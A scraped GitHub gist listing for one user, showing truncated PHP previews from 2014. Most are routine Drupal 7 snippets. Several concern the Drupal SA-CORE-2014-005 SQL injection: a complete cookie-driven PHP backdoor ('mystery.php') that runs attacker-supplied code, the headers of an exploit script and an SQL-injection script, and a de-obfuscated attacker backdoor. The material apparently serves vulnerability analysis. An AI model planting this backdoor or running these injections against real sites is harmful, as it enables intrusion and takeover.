Jersey Len mkorostoff
mkorostoff
/ mystery.php
Created
December 3, 2014 05:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo(); |
mkorostoff
/ exploit.php
Last active
March 23, 2025 17:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @author Matt Korostoff <[email protected]> | |
| * | |
| * @copyright Licensed under the GNU General Public License as published by the Free | |
| * Software Foundation, either version 3 of the License, or (at your option) | |
| * any later version. http://www.gnu.org/licenses/ | |
| * | |
| * @usage php path/to/this/file.php 'http://example.com' | |
| */ |
mkorostoff
/ gist:b1e482b675ec00e53726
Last active
August 29, 2015 14:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * The contents of $sql will be injected into a Drupal site located at $url | |
| * | |
| * @usage | |
| * php /path/to/this/file.php 'http://example.com' 'SELECT * FROM node' | |
| * | |
| * Based on http://www.exploit-db.com/exploits/34993/ by Dustin Dorr | |
| */ | |
| $url = $argv[1]; |
mkorostoff
/ gist:5b8f8fa4eb0e5a9cf1fc
Created
December 3, 2014 04:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| protected function expandArguments(&$query, &$args) { | |
| $modified = FALSE; | |
| // If the placeholder value to insert is an array, assume that we need | |
| // to expand it out into a comma-delimited set of placeholders. | |
| foreach (array_filter($args, 'is_array') as $key => $data) { | |
| $new_keys = array(); | |
| foreach ($data as $i => $value) { | |
| // This assumes that there are no other placeholders that use the same |
mkorostoff
/ gist:e7646fdf26a7532d27ac
Created
November 23, 2014 22:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @file | |
| * A de-obfuscated version of the file used by some attackers to install | |
| * backdoors on drupal sites, using the Drupal SA-CORE-2014-005 vulnerabilty. | |
| * | |
| * @usage | |
| * Runs any php code supplied by the user as a base64_encoded string in a | |
| * cookie. | |
| * |
mkorostoff
/ gist:c5dc5e15bbe35ef6f303
Created
November 17, 2014 16:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WD Apache Solr: HTTP Status: 0; Message: Request failed: Connection refused; Response: ; Request: [error] | |
| Unknown; Caller: call_user_func_array() (line Unknown of Unknown) | |
| WD Apache Solr: HTTP 0; Request failed: Connection refused in apachesolr_cron [error] | |
| WD Apache Solr: No Solr instance available during indexing. [error] | |
| Enter PEM pass phrase: | |
| stream_socket_client(): Unable to set private key file [warning] | |
| `/mnt/gfs/nbcupowertest/sites/default/files/files-private/apns-development-e222ab56e6.pem' | |
| push_notifications.module:947 | |
| stream_socket_client(): failed to create an SSL handle push_notifications.module:947 [warning] | |
| stream_socket_client(): Failed to enable crypto push_notifications.module:947 [warning] |
mkorostoff
/ gist:6030941f9ff36333f7f9
Created
November 10, 2014 22:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //Drupal 7 | |
| print l('Hello world', 'node/1'); | |
| //prints <a href="/path/to/node/alias">Hello world</a> |
mkorostoff
/ gist:de511538548022b5e5aa
Created
November 10, 2014 22:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //drupal 7 | |
| $node = node_load(1); | |
| print $node->created; //prints "1415659696" |
mkorostoff
/ gist:384c7f38aa8a94b598d9
Last active
August 29, 2015 14:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //drupal 7 | |
| $node = menu_get_object(); |
mkorostoff
/ gist:4dfa9e447933b69b6043
Last active
August 29, 2015 14:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8 | |
| $query = new EntityFieldQuery(); | |
| $next = $query->propertyCondition('created', $created_time, '>') | |
| ->entityCondition('bundle', 'article') | |
| ->propertyOrderBy('created', 'ASC') | |
| ->range(0, 1) | |
| ->execute(); | |
| //DRUPAL 7 VERSION; DO NOT USE FOR DRUPAL 8 |